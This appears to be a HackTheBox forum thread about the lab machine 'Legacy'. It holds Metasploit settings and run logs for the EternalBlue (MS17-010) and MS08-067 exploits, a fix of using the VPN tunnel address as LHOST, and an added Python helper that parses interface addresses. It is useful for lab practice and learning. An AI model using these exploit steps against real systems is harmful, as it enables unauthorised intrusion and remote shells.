Legacy Machine not receiving response from exploit packet

Hey,

I’m getting into HackTheBox and having an abnormally hard time with this box as the exploit (ms17_010_eternalblue) isn’t receiving a response back from the exploit.

I’ve tried on the parrot box from HTB and it doesn’t seem to come back…

I’ve looked into this forum but nothing helped when trying these methods.

Options:

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name           Current Setting  Required  Description
----           ---------------  --------  -----------
RHOSTS         10.10.10.4       yes       The target host(s), range CIDR identifier, or hosts file with syntax ‘file:’
RPORT          445              yes       The target port (TCP)
SMBDomain      .                no        (Optional) The Windows domain to use for authentication
SMBPass                         no        (Optional) The password for the specified username
SMBUser                         no        (Optional) The username to authenticate as
VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/bind_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique (Accepted: ‘’, seh, thread, process, none)
LPORT     4444             yes       The listen port
RHOST     10.10.10.4       no        The target address

Exploit target:

Id  Name
--  ----
0   Windows 7 and Server 2008 R2 (x64) All Service Packs

Results:

[*] 10.10.10.4:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.4:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1
[*] 10.10.10.4:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.4:445 - Connecting to target for exploitation.
[+] 10.10.10.4:445 - Connection established for exploitation.
[+] 10.10.10.4:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.4:445 - CORE raw buffer dump (11 bytes)
[*] 10.10.10.4:445 - 0x00000000 57 69 6e 64 6f 77 73 20 35 2e 31 Windows 5.1
[+] 10.10.10.4:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.4:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.4:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.4:445 - Starting non-paged pool grooming
[+] 10.10.10.4:445 - Sending SMBv2 buffers
[+] 10.10.10.4:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.4:445 - Sending final SMBv2 buffers.
[*] 10.10.10.4:445 - Sending last fragment of exploit packet!
[*] 10.10.10.4:445 - Receiving response from exploit packet
[-] 10.10.10.4:445 - Did not receive a response from exploit packet
[*] 10.10.10.4:445 - Sending egg to corrupted connection.
[-] 10.10.10.4:445 - Errno::ECONNRESET: Connection reset by peer
[*] Started bind TCP handler against 10.10.10.4:4444
[*] Exploit completed, but no session was created.

Interfaces:

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 46:2e:41:c8:dc:71 brd ff:ff:ff:ff:ff:ff
inet 159.65.222.18/21 brd 159.65.223.255 scope global eth0
valid_lft forever preferred_lft forever
inet 10.10.0.20/16 brd 10.10.255.255 scope global eth0:1
valid_lft forever preferred_lft forever
inet6 fe80::442e:41ff:fec8:dc71/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether be:d2:de:34:36:8e brd ff:ff:ff:ff:ff:ff
inet 10.116.0.16/20 brd 10.116.15.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::bcd2:deff:fe34:368e/64 scope link
valid_lft forever preferred_lft forever
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 100
link/none
inet 10.10.14.7/23 brd 10.10.15.255 scope global tun0
valid_lft forever preferred_lft forever
inet6 dead:beef:2::1005/64 scope global
valid_lft forever preferred_lft forever
inet6 fe80::b85b:e82c:aa0a:6622/64 scope link stable-privacy
valid_lft forever preferred_lft forever
6: teredo: <POINTOPOINT,MULTICAST,NOARP> mtu 1500 qdisc noop state DOWN group default qlen 500
link/none

Alright, noob move everyone…

I believe I actually used the wrong interface when executing these exploits in MSFConsole.

If anyone else has this problem, just set your LHOST field to an internal IP range (10.X.X.X) to the Legacy box which makes it reachable to create a Meterpreter shell.

Ensure you’re using your tunnel IP address:

tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.14.7 netmask 255.255.254.0 destination 10.10.14.7
inet6 fe80::b85b:e82c:aa0a:6622 prefixlen 64 scopeid 0x20
inet6 dead:beef:2::1005 prefixlen 64 scopeid 0x0
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 100 (UNSPEC)
RX packets 2880 bytes 359942 (351.5 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 5654 bytes 1495091 (1.4 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

set that as your LHOST and send your exploit.
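An added example, not part of the original posts: a small check of which local interfaces are directly attached to a network containing a given destination, run over the IPv4 addresses from the interface listing posted above. The function names are hypothetical, and it only considers directly attached subnets; routes pushed by a VPN client are not visible in this output and need `ip route get` on the live host.

```python
import ipaddress
import re

# Constructed sample: the IPv4 lines of the interface listing posted in the thread.
IP_ADDR_OUTPUT = """\
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500
    inet 159.65.222.18/21 brd 159.65.223.255 scope global eth0
    inet 10.10.0.20/16 brd 10.10.255.255 scope global eth0:1
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500
    inet 10.116.0.16/20 brd 10.116.15.255 scope global eth1
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500
    inet 10.10.14.7/23 brd 10.10.15.255 scope global tun0
"""

IFACE_RE = re.compile(r"^\d+:\s+([^:@\s]+)")                 # "5: tun0: <...>"
INET_RE = re.compile(r"^\s*inet\s+(\d+\.\d+\.\d+\.\d+/\d+)")  # IPv4 only, skips inet6


def parse_ipv4_interfaces(text):
    """Return [(ifname, IPv4Interface)] parsed from `ip addr` style output."""
    result, current = [], None
    for line in text.splitlines():
        header = IFACE_RE.match(line)
        if header:
            current = header.group(1)
            continue
        inet = INET_RE.match(line)
        if inet and current:
            result.append((current, ipaddress.ip_interface(inet.group(1))))
    return result


def connected_matches(text, destination):
    """Interfaces whose own subnet contains destination, most specific first."""
    dest = ipaddress.ip_address(destination)
    hits = [(n, i) for n, i in parse_ipv4_interfaces(text) if dest in i.network]
    return sorted(hits, key=lambda h: h[1].network.prefixlen, reverse=True)


def address_of(text, ifname):
    """First IPv4 address configured on ifname, or None if it has none."""
    return next((str(i.ip) for n, i in parse_ipv4_interfaces(text) if n == ifname), None)


if __name__ == "__main__":
    for name, iface in connected_matches(IP_ADDR_OUTPUT, "10.10.10.4"):
        print(f"10.10.10.4 is inside {iface.network} on {name} ({iface.ip})")
    print("tun0 address:", address_of(IP_ADDR_OUTPUT, "tun0"))
```

On a multi-homed host like the one in the listing, more than one interface can carry a 10.x address, so the address facing the lab has to be read from the interface table or routing table rather than assumed.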

Hi,

Does anyone else have the following issue with the “Legacy” machine?

It seemingly just hangs forever on “Sending stage (175174 bytes) to 10.10.10.4”, see full output below.

msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 10.10.14.23:4444 
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 10.10.10.4

I have tried resetting the machine, using a different HTB VPN connection and running the exploit manually, all to no avail.

I have also noticed that the vulnerable SMB service seems to go up and down on the machine, as well as NMAP scans sometimes needing to be run with the -Pn flag. Not sure if it is linked to the issue?